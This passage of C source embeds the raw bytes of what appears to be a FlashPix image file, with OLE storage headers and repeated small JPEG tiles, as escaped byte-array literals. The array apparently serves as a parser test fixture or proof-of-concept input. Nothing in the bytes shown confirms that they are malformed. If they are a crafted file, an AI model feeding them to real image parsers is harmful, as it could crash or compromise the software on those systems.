+"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x48\x00\x65\x00" +"\x61\x00\x64\x00\x65\x00\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x2a\x00\x02\x01\x12\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x65\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00" +"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00" +"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x44\x00\x61\x00" +"\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x26\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x66\x00\x00\x00\x9e\x08\x00\x00\x00\x00\x00\x00" +"\x52\x00\x65\x00\x73\x00\x6f\x00\x6c\x00\x75\x00\x74\x00\x69\x00" +"\x6f\x00\x6e\x00\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x20\x00\x01\x00\xff\xff\xff\xff\xff\xff\xff\xff\x14\x00\x00\x00" +"\x00\x61\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b" +"\x00\x00\x00\x00\x20\x4e\xb2\x3b\x79\x7f\xc7\x01\xa0\x68\xb8\x3b" +"\x79\x7f\xc7\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x01\x01\x00\x54\xc1\xce\x11" +"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00" +"\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00" +"\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80" +"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" +"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" +"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" 
+"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x00\xff\xd9\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00" +"\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01" +"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a" +"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" +"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" +"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" +"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x00" +"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8" +"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01" +"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f" +"\x00\xf5\x5a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x6c\x8e\x91\xc6\xd2" +"\x48\xc1\x51\x41\x2c\xc4\xe0\x00\x3b\xd3\xab\x1b\xc4\xb0\x5c\xea" +"\x16\xb1\x69\x36\xdb\xe3\x5b\xc6\x2b\x3c\xe1\x72\x23\x88\x0c\xb7" +"\xe2\xdc\x2e\x3d\xcf\xa5\x00\x58\xd2\xb5\x9b\x4d\x4f\x4a\xfe\xd0" +"\x8d\x8c\x31\x29\x60\xe2\x5f\x94\xc7\x8f\xef\x67\xa7\x18\x3f\x42" +"\x2a\x27\xf1\x05\x8a\x6a\x0b\x01\x9e\x0f\x20\xc2\xf2\x9b\x9f\x34" +"\x6d\x05\x5d\x57\x6f\xd7\x2d\xeb\xda\xb1\x75\x2d\x33\x51\xb2\x83" +"\x54\x84\x3c\xda\x8c\x7a\x9d\xa4\x80\x94\x84\x29\x49\x55\x30\xa3" +"\x0b\xc7\xcc\xbc\x67\xd5\x40\xef\x56\xaf\x60\x4b\x3f\x11\x69\x97" +"\x4f\xa6\x4b\x2d\xad\xbd\x9b\xc7\xbe\x28\x77\x88\x18\xb2\xe0\xe0" +"\x73\xd0\x11\xc0\xc8\xfa\x50\x07\x4d\x45\x14\x50\x01\x45\x14\x50" +"\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50" +"\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50" +"\x01\x45\x14\x50\x01\x59\x7a\xd6\xa7\x3e\x9e\xf6\x51\x5a\xda\x8b" +"\x99\xaf\x26\xf2\x54\x33\xec\x0a\x76\x96\xc9\x38\x3c\x0c\x73\x5a" +"\x95\x9f\xa8\xd8\xc9\x77\x7f\xa6\xdc\x23\xaa\xad\xa4\xed\x2b\x83" 
+"\xd4\x83\x1b\x2f\x1f\x8b\x0a\x00\xff\xd9\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00" +"\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03" +"\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\xe8\xae\xed\x67\xb5\xfb" +"\x54\x37\x11\x49\x06\x09\xf3\x55\xc1\x5c\x0e\xbc\xf4\xa8\xe0\xd4" +"\xf4\xfb\x88\x64\x9a\x0b\xeb\x69\x62\x8b\x99\x1d\x25\x52\x13\xea" +"\x73\xc5\x73\x53\xd9\x5c\x5d\xb5\xed\xf5\xbd\x84\xab\x63\x25\xcc" +"\x12\xb5\x9b\x26\xd6\xb8\x09\x9d\xed\xb0\xfa\xe5\x38\x38\x2d\xe5" +"\xfb\xd2\x6b\xd1\x36\xae\xb7\x33\xe9\xd6\x17\x2a\x12\xc2\x68\xa4" +"\x77\x81\xa3\x69\x8b\x01\xb6\x30\x08\x04\xe0\x82\x73\xdb\xa0\xea" +"\x68\x03\xa6\x7d\x53\x4f\x4b\x6f\xb4\x3d\xf5\xba\xc3\xb8\xa7\x98" +"\x64\x1b\x4b\x0e\xa3\x3e\xbc\x52\xc9\xa8\xd8\xc5\x66\xb7\x72\xde" +"\x5b\xa5\xb3\xe0\x2c\xc6\x40\x11\xb3\xe8\x7a\x56\x16\xb1\x65\x34" +"\x1a\xed\x9d\xda\x3d\xc4\x36\x71\xdb\x18\x50\xdb\x40\xb2\xf9\x2d" +"\x9c\x9f\x94\xa9\x20\x11\x81\x90\x3f\x87\x07\xad\x53\x92\xcb\xca" +"\xd2\x7e\xd5\xb3\x52\x4b\x83\x74\xf3\xc0\xcd\x68\xae\x43\x6c\xda" +"\x77\x44\xa3\x85\x71\x9e\x0e\x0e\x4e\x72\x09\xa0\x0e\xaa\xeb\x50" +"\xb2\xb3\x44\x7b\xbb\xb8\x20\x59\x3e\xe1\x92\x40\xbb\xbe\x99\xeb" +"\x4b\x2d\xf5\x9c\x36\x82\xee\x5b\xa8\x52\xdc\xe0\x89\x4b\x80\xa7" +"\x3d\x30\x7a\x56\x0d\xab\xcd\x63\xaa\xb5\xf6\xab\xa7\xcb\x9b\x9b" +"\x58\x84\x6d\x04\x46\x51\x6e\x42\xfc\xf1\x61\x41\x20\x6e\x39\x07" +"\xa1\xcf\xb5\x43\xa8\x5b\x3b\xc9\xa6\x5f\x5b\xda\x5d\x58\x59\xc4" +"\x66\x26\x38\xad\xd1\x9e\x27\x62\x31\x21\x8f\x07\xa8\x0d\xd0\x64" +"\x6e\xfa\xd0\x07\x48\xb7\xf6\x6f\x6c\xb7\x2b\x77\x01\x81\x8e\xd5" +"\x90\x48\x36\x93\x9c\x63\x3e\xb9\xa2\xd2\xfa\xd2\xf9\x19\xec\xee" +"\xa1\xb8\x55\x38\x63\x13\x86\x00\xfe\x15\xca\x1d\x31\xae\x6d\x24" +"\x93\xec\xf7\xb3\xa5\xce\xa1\x6c\xce\xb7\x10\xaa\x6f\x55\x71\xb9" +"\xf6\x28\x18\x18\xea\x58\x64\x85\x15\x73\x5c\xd3\xaf\x2e\x35\x0b" 
+"\xf5\xb1\x80\xed\x9a\xc2\x35\x20\x7c\x8b\x29\x59\x09\x31\xee\xec" +"\x4a\x92\x3f\xe0\x54\x01\xd3\xd1\x45\x14\x00\x51\x45\x14\x00\x51" +"\x45\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51" +"\x45\x14\x00\x51\x45\x14\x01\x88\x75\x3d\x52\x7b\xa7\xb3\xd3\xed" +"\x2d\x64\x9a\xd9\x54\x5c\xcb\x2c\xac\xb1\xab\x90\x0e\xc5\xc2\x92" +"\x78\x20\xe7\x8c\x64\x54\x30\xf8\x99\xcd\xb5\xdb\x5c\xe9\xd2\x45" +"\x73\x05\xd2\xda\x25\xb2\xb8\x63\x2c\x85\x41\x00\x1e\x06\x39\xce" +"\x7d\x06\x7d\xaa\x79\x2c\xb5\x3b\x1d\x52\xe6\xeb\x4a\x16\xd3\xc3" +"\x78\x43\xcb\x04\xee\x63\x29\x20\x50\xbb\x95\x80\x39\x04\x01\x90" +"\x47\x6e\x0f\x35\x4e\x2f\x0e\xea\x0f\x05\xdc\xb7\x57\xb0\xfd\xba" +"\x4b\xc4\xbd\x86\x58\xd0\xec\x46\x54\x0a\x14\x8c\xf2\xb8\x05\x7a" +"\xf2\x39\xeb\x40\x1a\x36\xb3\xeb\x26\xe1\x22\xd4\x34\xfb\x6f\x26" +"\x5c\x83\x25\xb5\xc1\x6f\x2b\x8f\xe2\x0c\x01\x39\xe9\x91\xf9\x56" +"\x4e\x97\xad\x4a\xb6\x5a\x4d\x96\x91\xa6\x86\x37\x76\x86\x74\x12" +"\xdc\x12\x22\x00\x8f\xbc\xc4\x12\x47\xcd\xfc\xab\x62\xd4\xeb\x92" +"\x5d\x46\x6f\x12\xc6\xde\x04\xce\xf1\x13\xb4\x8d\x21\xc7\x6c\x85" +"\xda\x33\xcf\x7e\x95\x4f\x44\xd0\xae\x34\xe9\x74\xd7\x96\x58\xdc" +"\x5a\x58\x35\xab\xed\xcf\x2c\x59\x0e\x47\xb7\xca\x68\x00\x6f\x11" +"\xfd\x96\xc2\xf1\xb5\x1b\x75\x4b\xcb\x49\x96\x06\x8a\x39\x01\x59" +"\x1d\xc0\x29\xb5\x8e\x30\x0e\xe1\xd7\xa6\x0f\xa5\x25\x97\x88\x65" +"\xfe\xd0\x82\xd7\x50\xfe\xcf\xff\x00\x4a\x62\x91\x3d\x9d\xd7\x9b" +"\xb5\xb0\x4e\xd6\x04\x03\xd0\x1e\x47\x19\xf4\xc8\xa2\xfb\xc3\xb2" +"\x5e\x4b\xa9\xc8\x66\x88\x3d\xc4\xf0\xdc\x5b\x96\x5d\xc1\x1a\x35" +"\x03\xe6\x1d\xc1\x20\xfe\x06\x9f\xa7\xe9\xb7\xa3\x50\x8a\x7b\x8b" +"\x3d\x32\xc6\x28\x41\xca\xda\xa6\xf6\x94\xe3\xfb\xc5\x46\xd1\xdf" +"\x8e\x7d\xe8\x02\x6f\x16\x4f\x25\xbf\x86\x2f\xde\x16\x2b\x2b\x47" +"\xe5\xa3\x0e\xa1\x98\x85\x1f\xa9\xa8\xbe\xdb\x73\x6d\xac\x43\xa0" +"\xe9\xf6\x88\xe9\x0d\xac\x72\xb4\xd2\xca\x40\x54\xdc\x53\x18\xc1" +"\x25\xb0\xbc\x53\xfc\x60\x8c\xfe\x16\xbd\x64\x1b\x8c\x4a\xb3\x63" 
+"\xd4\x23\x07\x3f\xa2\xd5\x88\x6c\xd9\xb5\xe9\x35\x44\x91\x1a\x19" +"\xad\x23\x85\x40\xeb\x90\xce\xd9\xfa\x61\x85\x00\x00\xff\xd9\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00" +"\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01" +"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\xab" +"\x6d\x4f\x4f\xbb\x9d\xa1\xb5\xbe\xb7\x9e\x55\x19\x29\x1c\xa1\x88" +"\x1f\x41\x4a\x9a\x8d\x8b\xde\x1b\x34\xbc\xb7\x6b\x91\x9c\xc2\x24" +"\x05\x86\x3a\xf1\xd6\xb3\xa2\xb9\xb5\xbc\x68\x20\xb5\xd2\xee\x61" +"\x95\x11\xb6\x49\x25\xaf\x96\x2d\x4e\xd2\x3a\x9c\x0e\xf8\xc2\xe7" +"\xf2\xac\x0b\x1d\x3a\x6f\xec\xfb\x1d\x2e\x5f\xed\x31\x34\x52\x21" +"\x92\x34\xb5\x8d\x56\x36\x52\x09\x90\x4a\x57\x04\x64\x13\x90\x4b" +"\x1f\xa9\x34\x01\xd5\xeb\x3a\x8b\xe9\xb6\xb1\xc9\x15\xbf\xda\x25" +"\x96\x64\x85\x23\xdf\xb3\x25\x8e\x39\x3d\xaa\x0b\x4d\x5e\x63\x7d" +"\x1d\x9e\xa7\xa7\xc9\x63\x34\xd9\xf2\x5b\xcc\x12\x47\x21\x1c\x95" +"\x0c\x3a\x1c\x73\x82\x07\x00\xfa\x53\x3c\x4e\xb2\x7d\x92\xce\x58" +"\xe1\x96\x61\x0d\xec\x32\xba\xc4\x85\xd8\x28\x6e\x4e\x07\x26\xa1" +"\x92\x79\x75\xbd\x4e\xc5\x20\xb2\xbb\x82\xda\xd2\x6f\xb4\x49\x3d" +"\xc4\x46\x2c\x90\xac\x15\x54\x1e\x49\x3b\xb9\x38\xc0\x03\xde\x80" +"\x2e\xe9\x3a\xdd\xae\xab\x63\x25\xc5\xb6\x43\x44\x48\x92\x26\xfb" +"\xc8\x47\xf4\x3d\x41\xef\x54\xd7\xc4\x33\xdc\x7d\x9c\x58\x69\xa6" +"\xe2\x49\x2d\x23\xbc\x92\x33\x30\x46\x54\x7e\x81\x72\x3e\x63\xc1" +"\xf4\x1d\x39\xe6\xa9\xd8\xe9\x17\x91\xe8\x56\xb7\x56\x91\xf9\x3a" +"\x94\x28\xe8\xd1\x49\xf2\x89\x90\xb3\x1f\x2d\xbd\x3a\xe4\x1e\xc4" +"\xfa\x13\x9a\xd7\x2a\xf0\xe8\x76\x16\xf2\xe9\xd7\xf0\xea\x36\xd6" +"\x71\xfd\x92\xe6\xde\x32\xec\x25\xda\x01\x8c\x91\xc0\x19\x03\x21" +"\xbe\x52\x3e\x9c\x00\x76\x40\xe4\x03\x8c\x7b\x52\xd4\x70\x19\x0c" +"\x11\x99\xc2\x89\x76\x8d\xe1\x7a\x03\x8e\x71\x52\x50\x01\x45\x14" +"\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14" 
+"\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x07\x3f\x1e" +"\xb5\xaa\x5d\xdb\x3e\xa1\xa6\xe9\x91\x4d\x60\xa5\xb6\x6f\x9c\xac" +"\xb3\xa8\x38\xdc\x8b\xb4\x80\x0f\x38\x04\xf3\xed\x9a\x96\x4d\x71" +"\xee\xde\xda\x0d\x12\x04\xb9\x96\xe2\xdc\x5d\x6f\x99\x8a\x47\x1c" +"\x67\xee\x96\xc0\x27\x24\xe4\x00\x07\x63\xe9\x51\x5b\xe9\xfa\xde" +"\x9b\x62\x74\xcd\x35\xac\xda\xdd\x72\xb0\x5c\x4a\xcc\x1e\x24\x27" +"\x80\x50\x0c\x31\x19\xc0\x39\x19\xc0\xcd\x3a\x3d\x16\xe3\x4a\x7b" +"\x59\xb4\x63\x1c\x9e\x4d\xaa\xda\x49\x0d\xc3\x15\x12\x22\x92\x55" +"\x83\x00\x70\xc0\x96\xec\x41\xcf\x6c\x50\x04\x1a\x9e\xab\x79\x36" +"\x81\xad\x5b\x3d\xb2\x5b\xea\x16\xb6\xec\x5d\x44\xa7\x69\x46\x53" +"\x89\x11\xb1\x9e\xc7\x8c\x0e\x46\x3d\xe9\x24\x92\xe2\x28\xbc\x33" +"\x79\x71\x84\x98\xcc\x20\x91\x63\x90\xb2\xb2\xbc\x6d\xdc\xe3\x3c" +"\xaa\x1a\xb1\xfd\x8d\x7b\x73\x69\xab\x4b\x7b\x2c\x02\xf7\x50\xb7" +"\x36\xea\xb1\xe4\xc7\x0a\x05\x60\xa3\x27\x93\xcb\x12\x4f\x1d\x7a" +"\x71\x4c\xd4\xe3\xc5\xdf\x87\x74\xbc\xee\x91\x26\xf3\x98\x8e\xcb" +"\x1c\x67\x27\xfe\xfa\x2a\x3f\x1a\x00\xe8\x68\xa2\x8a\x00\x28\xa2" +"\x8a\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02" +"\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11" +"\x00\x3f\x00\xf5\x5a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" +"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" +"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" +"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" +"\x0a\x28\xa2\x80\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01" +"\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02" +"\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" 
+"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" +"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" +"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" +"\x28\xa2\x80\x0a\x28\xa2\x80\x00\xff\xd9\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00" +"\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03" +"\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80\x0a\x28" +"\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28" +"\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28" +"\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28" +"\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x00\xff\xd9\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08" +"\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda" +"\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2" +"\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2" +"\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2" +"\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2" +"\x80\x0a\x28\xa2\x80\x0a\x28\xaa\x97\x5a\x95\x95\xa4\x82\x39\xee" +"\x14\x4a\xdd\x23\x5c\xb3\x9f\xf8\x08\xc9\xa6\x93\x7b\x09\xb4\xb7" +"\x2d\xd1\x50\x5d\x7d\xa4\xc2\x3e\xc7\xe5\x09\x09\x19\x32\xe7\x00" +"\x7d\x07\x53\xed\xc5\x36\xce\x0b\x88\x43\x9b\x9b\xb6\xb8\x76\x3f" +"\xdc\x0a\xab\xec\x00\xfe\xa4\xd1\x6d\x2e\x17\xd6\xc0\xff\xd9\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00" +"\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01" +"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a" +"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" 
+"\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a" +"\x28\xa2\x80\x0a\x28\xaa\x2d\xaa\xda\x7d\xa0\x41\x0b\xb5\xc4\xb9" +"\xc1\x58\x54\xbe\xde\x71\xc9\x1c\x0f\xc6\x9a\x4d\xec\x26\xd2\xdc" +"\xbd\x45\x56\xbc\x8e\xee\x40\xab\x69\x3c\x70\x03\x9d\xee\xd1\xef" +"\x3f\x80\xce\x3f\x3a\x5b\x4b\x63\x6d\x19\x56\xb8\x9a\xe1\x98\xe4" +"\xbc\xa4\x13\xf8\x60\x00\x07\xd2\x8b\x68\x17\xd6\xc4\x29\xab\x5b" +"\x4d\x38\x8a\xd7\xcc\xb9\x3b\xb6\xb3\xc2\xb9\x44\xfa\xb7\x4f\xd7" +"\x35\x25\xe4\x37\x53\x14\x5b\x7b\xbf\xb3\x27\x3b\xc8\x8c\x33\x1f" +"\x4c\x13\xc0\xfc\x8d\x59\x00\x28\xc2\x80\x00\xec\x2a\x8e\xa5\xac" +"\xe9\xfa\x5a\xe6\xf2\xe5\x11\xbb\x46\x39\x73\xf4\x03\x9a\xa5\xab" +"\xf7\x51\x2f\x45\xef\x3f\xd0\x74\xfa\xad\x9c\x33\x79\x1e\x6f\x9b" +"\x36\x71\xe5\x44\x0b\xb0\xfa\x81\xd3\xf1\xa9\x6f\x16\xed\x91\x56" +"\xca\x48\x63\x62\x7e\x67\x91\x4b\x60\x7b\x00\x46\x4f\xe3\x52\xc7" +"\x14\x71\x67\xca\x8d\x53\x71\xc9\xda\x31\x93\xeb\x4f\xa5\x75\xd0" +"\x76\x6f\x72\xbd\x9d\xbc\xb0\x23\x79\xf7\x52\x5c\xbb\x1c\x96\x70" +"\x00\x1e\xc0\x01\xc0\xa9\x91\x12\x35\xdb\x1a\x2a\x2f\xa2\x8c\x0a" +"\x6c\xd3\x45\x6f\x11\x96\x79\x12\x24\x5e\xac\xe7\x00\x56\x1c\xbe" +"\x26\x17\x32\x98\x34\x2b\x39\x75\x19\x47\x06\x41\xf2\xc4\xbf\x56" +"\x34\xd4\x65\x3d\x89\x94\xe3\x0d\xcd\xf3\xc0\xc9\xac\x7b\xff\x00" +"\x13\x69\xf6\xb2\xf9\x10\x33\xde\xdc\x9e\x90\xdb\x0d\xe7\xf1\x23" +"\x81\x55\x7f\xb0\xf5\x3d\x53\xe6\xd7\xb5\x12\xb1\x1f\xf9\x74\xb4" +"\xf9\x53\xe8\x4f\x53\xfe\x79\xad\x9b\x0d\x36\xcb\x4e\x8f\xcb\xb2" +"\xb6\x8e\x10\x7a\x95\x1c\x9f\xa9\xea\x6a\xad\x08\xee\xee\x4d\xe7" +"\x2d\x95\x8c\x6f\x27\xc4\x5a\xc7\xfa\xe9\x57\x47\xb6\x3f\xc1\x1f" +"\xcf\x29\x1e\xe7\xb5\x5e\xd3\x7c\x3d\xa6\xe9\xaf\xe6\xc5\x07\x9b" +"\x3f\x53\x3c\xc7\x7b\x93\xeb\x93\xd3\xf0\xad\x5a\x29\x3a\x8d\xab" +; + + +unsigned char FPX_file2[] = +"\x2d\x11\x4a\x94\x53\xbb\xd5\x80\xff\xd9\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00" +"\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03" +"\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80\x0a\x28" +"\xa2\x80\x0a\x28\xa2\x80\x0a\x29\x92\xc8\x90\xc4\xd2\xc8\x70\x88" +"\x32\x4e\x33\xc5\x55\xb5\xbf\x7b\xb9\x80\x8a\xce\x74\x83\x19\xf3" +"\xa5\x1b\x33\xf4\x53\xf3\x7e\x82\x9a\x4d\xea\x26\xd2\x76\x2e\xd1" +"\x48\x48\x00\x92\x70\x07\x7a\xa5\x0e\xa9\x0d\xcc\xeb\x1d\xac\x53" +"\xce\x84\xf3\x32\xa6\x23\x5f\xf8\x11\xc6\x7f\x0c\xd0\x93\x60\xda" +"\x5b\x97\xa9\xae\xeb\x1a\x33\xb9\xc2\xa8\xc9\x27\xb0\xaa\xf7\x76" +"\xd7\x17\x0e\xa2\x3b\xd7\xb7\x8b\x18\x61\x1a\x8d\xcd\xff\x00\x02" +"\x39\xc7\xe5\x52\x5b\xc2\x96\x96\xe2\x30\xee\x55\x72\x4b\x48\xe5" +"\x8f\xa9\x24\x9a\x2c\xac\x17\x77\x2b\xdb\x6a\x42\xee\x75\x5b\x6b" +"\x6b\x86\x84\xf5\x9d\x93\x62\xfe\x1b\xb0\x4f\xe0\x29\xf7\x76\x72" +"\xdd\x48\x3f\xd3\x66\x86\x10\x39\x48\x70\xa5\x8f\xfb\xdd\x7f\x2a" +"\xce\xbc\xf1\x45\x94\x73\x9b\x6b\x04\x97\x51\xba\xe9\xe5\xdb\x8c" +"\x81\xf5\x6e\x9f\xce\xa0\xfb\x16\xbf\xab\xf3\xa8\x5d\x8d\x32\xdc" +"\xff\x00\xcb\x0b\x53\x99\x0f\xd5\xbf\xc2\xb5\xe4\x6b\x57\xa1\x8b" +"\x9a\x7a\x2d\x7d\x0b\xb7\x5a\xbe\x95\xa2\x42\xb6\xf2\x5c\x65\xd7" +"\x85\x85\x49\x92\x43\xcf\xe2\x7f\x3a\xa5\xf6\xaf\x11\x6a\xfc\x59" +"\xdb\x26\x95\x6c\x7f\xe5\xad\xc0\xdd\x29\x1e\xcb\xdb\xf1\xfc\xeb" +"\x4b\x4c\xd0\xf4\xed\x2c\x66\xd6\xdd\x7c\xce\xf2\xbf\xcc\xe7\xf1" +"\x35\xa3\x4b\x9a\x31\xf8\x55\xfd\x7f\xc8\x7c\x92\x97\xc4\xec\xbb" +"\x2f\xf3\x21\xb4\xb7\xfb\x34\x3e\x5f\x9d\x34\xdc\xe4\xbc\xaf\xb9" +"\x8d\x17\x37\x56\xf6\x70\x99\x6e\xa6\x8e\x18\xc7\xf1\x3b\x00\x2b" +"\x0b\xfb\x4b\x5c\xd5\x8e\x34\xab\x2f\xb0\xdb\x9f\xf9\x78\xbb\x1f" 